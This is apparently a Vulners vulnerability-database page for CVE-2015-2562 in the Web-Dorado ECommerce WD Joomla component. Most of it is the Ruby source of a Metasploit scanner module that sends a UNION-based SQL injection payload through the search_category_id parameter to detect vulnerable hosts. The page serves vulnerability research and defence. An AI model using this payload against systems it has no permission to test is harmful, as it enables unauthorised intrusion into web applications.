Vulners
Lucene search
Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2015-2562 | 29 May 201815:50 | – | circl |
 | Multiple SQL Injection Vulnerabilities in Joomla! Web-Dorado ECommerce WD Components | 23 Mar 201500:00 | – | cnvd |
 | CVE-2015-2562 | 20 Mar 201514:00 | – | cve |
 | CVE-2015-2562 | 20 Mar 201514:00 | – | cvelist |
 | CVE-2015-2562 | 20 Mar 201514:59 | – | nvd |
 | Web-Dorado ECommerce WD For Joomla! Search_category_id SQL Injection Scanner | 1 Sep 202400:00 | – | packetstorm |
 | Sql injection | 20 Mar 201514:59 | – | prion |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner',
'Description' => %q{
This module will scan for hosts vulnerable to an unauthenticated SQL injection within the
advanced search feature of the Web-Dorado ECommerce WD 1.2.5 and likely prior.
},
'Author' =>
[
'bperry'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-2562']
],
'DisclosureDate' => '2015-03-20'))
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
])
end
def run_host(ip)
left_marker = Rex::Text.rand_text_alpha(5)
right_marker = Rex::Text.rand_text_alpha(5)
flag = Rex::Text.rand_text_alpha(5)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_get' => {
'option' => 'com_ecommercewd',
'controller' => 'products',
'task' => 'displayproducts',
'Itemid' => '-1'
},
'vars_post' => {
'product_id' => '-1',
'product_count' => '',
'product_parameters_json' => '',
'search_name' => '',
'search_category_id' => "1) UNION ALL SELECT CONCAT(0x#{left_marker.unpack("H*")[0]},0x#{flag.unpack("H*")[0]},0x#{right_marker.unpack("H*")[0]})-- ",
'filter_filters_opened' => '0',
'filter_manufacturer_ids' => '1',
'filter_price_from' => '',
'filter_price_to' => '',
'sort_by' => '',
'sort_order' => 'asc',
'pagination_limit_start' => '0',
'pagination_limit' => '12'
}
})
unless res && res.body
vprint_error("Server did not respond in an expected way")
return
end
result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
if result
print_good("Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)")
report_vuln({
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => "Web-Dorado ECommerce WD search_category_id SQL injection",
:refs => self.references.select { |ref| ref.ctx_val == "2015-2562" }
})
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 27.5
EPSS0.38945